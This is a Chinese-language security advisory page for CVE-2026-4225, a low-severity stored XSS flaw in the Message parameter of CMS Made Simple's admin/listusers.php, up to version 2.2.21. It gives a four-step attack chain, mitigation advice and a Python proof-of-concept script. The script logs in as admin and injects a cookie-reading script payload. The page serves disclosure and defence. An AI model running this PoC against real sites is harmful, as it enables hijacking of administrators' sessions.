CVE-2026-4225 CVSS 2.4 低危

CVE-2026-4225 CMS Made Simple跨站脚本漏洞

披露日期: 2026-03-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4225

漏洞类型

XSS跨站脚本攻击

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

CMS Made Simple

漏洞概述

CVE-2026-4225是CMS Made Simple软件中的一个存储型跨站脚本（XSS）漏洞。该漏洞存在于用户管理模块的admin/listusers.php文件中，攻击者可以通过Message参数注入恶意脚本代码。漏洞影响CMS Made Simple 2.2.21及之前版本，CVSS评分2.4，属于低危漏洞。由于需要高权限用户交互，攻击复杂度较低但实际利用需要一定的社会工程学手段。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。虽然CVSS评分较低，但存储型XSS漏洞一旦被利用，可能对业务系统和用户数据安全造成严重影响。建议受影响的用户及时更新到最新版本或应用官方安全补丁。

技术细节

该漏洞是存储型XSS（Stored XSS）漏洞，存在于CMS Made Simple的用户管理模块中。具体来说，问题出现在admin/listusers.php文件的Message参数处理逻辑中。攻击者通过构造特制的恶意脚本代码作为Message参数值，当其他管理员查看用户列表或相关页面时，恶意代码会在受害者浏览器中执行。漏洞根源在于应用程序未对用户输入进行充分的输入验证和输出编码。攻击者需要具有高权限才能触发此漏洞，但一旦恶意脚本被存储，任何访问相关页面的用户都会受到攻击。攻击者可利用此漏洞窃取会话令牌、获取敏感信息或进行进一步的攻击。漏洞利用不需要复杂的攻击技术，但需要目标用户进行一定的交互操作。

攻击链分析

STEP 1

步骤1

攻击者获取CMS Made Simple管理员账户访问权限

STEP 2

步骤2

攻击者构造恶意XSS payload并通过admin/listusers.php的Message参数注入

STEP 3

步骤3

恶意脚本被存储在服务器端，当其他管理员访问用户管理页面时触发

STEP 4

步骤4

攻击者通过XSS漏洞窃取受害者cookie、会话令牌或进行账户劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-4225 PoC - CMS Made Simple XSS in admin/listusers.php
# Target: CMS Made Simple <= 2.2.21

target_url = "http://target-site.com/"
admin_path = "admin/listusers.php"
login_url = target_url + "admin/login.php"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# Step 1: Login as admin
session = requests.Session()
login_data = {
    "username": "admin",
    "password": "admin123",
    "loginsubmit": "Submit"
}

response = session.post(login_url, data=login_data)

# Step 2: Inject XSS payload via Message parameter
inject_url = target_url + admin_path
inject_data = {
    "Message": xss_payload,
    "user_id": "1",
    "submit": "Save"
}

response = session.post(inject_url, data=inject_data)

# Step 3: Visit the page to trigger XSS
response = session.get(inject_url)
print("XSS payload injected successfully")
print("When admin visits listusers.php, the alert will be triggered")

影响范围

CMS Made Simple <= 2.2.21

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1）对admin/listusers.php文件中的Message参数进行输入过滤，移除或编码特殊字符；2）启用HTTPOnly和Secure标志的Cookie；3）限制管理界面的访问IP；4）实施严格的访问控制策略；5）监控和日志记录管理操作；6）考虑临时禁用用户管理模块的相关功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4225
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4225
3 Details https://www.cvedetails.com/cve/CVE-2026-4225/
4 VulDB https://vuldb.com/cve/CVE-2026-4225
5 Link https://github.com/feixuezhi/cms/wiki
6 Link https://vuldb.com/?ctiid.351148
7 Link https://vuldb.com/?id.351148
8 Link https://vuldb.com/?submit.770530

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表